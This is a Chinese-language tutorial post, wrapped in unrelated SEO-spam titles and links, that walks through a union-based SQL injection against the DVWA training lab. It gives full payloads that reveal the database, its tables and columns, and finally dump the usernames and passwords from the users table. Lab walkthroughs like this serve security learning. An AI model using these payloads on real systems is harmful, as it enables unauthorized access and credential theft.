当前位置: 首页 > news >正文

网站建设推广东莞网络推广及优化

网站建设推广,东莞网络推广及优化,ecs 安装 wordpress,遮罩层怎么做网页本次注入的是DVWA靶场的SQL injection 1.判断是字符型注入还是数字型注入,构造SQL语句 1 and 12 由此可以判断出为字符型注入 2.考虑闭合方式,先随便丢一个单引号试试看看报错提示 You have an error in your SQL syntax; check the manual that cor…

本次注入的是DVWA靶场的SQL injection

1.判断是字符型注入还是数字型注入,构造SQL语句

1 and 1=2

由此可以判断出为字符型注入

2.考虑闭合方式,先随便丢一个单引号试试看看报错提示

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1

根据报错提示可以看出是引号进行包括的值

3.判断输出的列数,使用order by函数与二分法

可以判断出列数为2

4.联合查询,尝试查看内容回显的地方

构造SQL语句 -1' union select 1,2 #

可以看到回显内容的地方是First name与Surname

查询出数据库 -1' union select 1,database() #

查询出数据表-1' union select 1,group_concat(hex(table_name)) from information_schema.tables where table_schema='dvwa' #

得到两个值去hex解码分别是 guestbook,users这两个也是DVWA数据库下面的所有表名,根据表的名字就可以判断出账号与密码存储在了users这个表里面,所以我们要对这个表进行查询,查询这个表里面的所有字段,开始构造SQL语句

-1' union select 1,group_concat(hex(column_name)) from information_schema.columns where table_schema='dvwa' and table_name='users' #

得到了表下面的所有字段内容

对这些内容分别进行解码,将要查询的字段提取出来,分别是user与password,再次构造SQL语句对这两个字段的内容进行查询

-1' union select 1,group_concat(user,'-',password) from dvwa.users #

成功注入出账号与密码。

http://www.ds6.com.cn/news/19197.html

相关文章:

  • 免费可信网站认证百度升级最新版本
  • 视觉设计部是干什么的seo服务商
  • 做网站用是内网穿透好网站优化内容
  • 什么网站系统做的最好seoul是啥意思
  • 怎么用源代码做网站网上的推广公司
  • 做食品批发的网站市场营销策划公司排名
  • 网页网站建设的ppt模板怎样在百度上建立网站
  • 建设局网站查询怎么制作自己的网站
  • 有专门做检验的视频网站吗收录好的网站有哪些
  • 网站开发搜索功能怎么实现公司怎么做网络营销
  • 国际网站建设招标seo排名优化软件有用
  • 东莞建设网站的公司简介推广赚钱app排行榜
  • 推广普通话绘画英语seo
  • 哥哥做姐姐干网站万能bt搜索引擎
  • 动易网站默认密码百度seo排名软件
  • 做网站前台要学哪些网络营销策划推广
  • dw内部网站链接怎么做营销推广投放
  • 旅游网站模板 手机站长工具 忘忧草
  • 怎么在ps里做网站设计靠谱的代运营公司
  • 用ps做衣服网站首页整站优化系统厂家
  • 过时的网站大数据网络营销
  • 汕头自助建站系统北京网站seo费用
  • 网站域名中文后缀美国疫情最新数据消息
  • 做公众号必了解的网站网站服务公司
  • 全屏网站表现形式太原最新情况
  • 广州购物网站开发微博热搜榜排名今日
  • 为何网站不被百度收录百度指数疫情
  • 一个网站做多少内链合适webview播放视频
  • 西安做网站陕西必达百度搜索竞价推广
  • 本人已履行网站备案信息好口碑关键词优化地址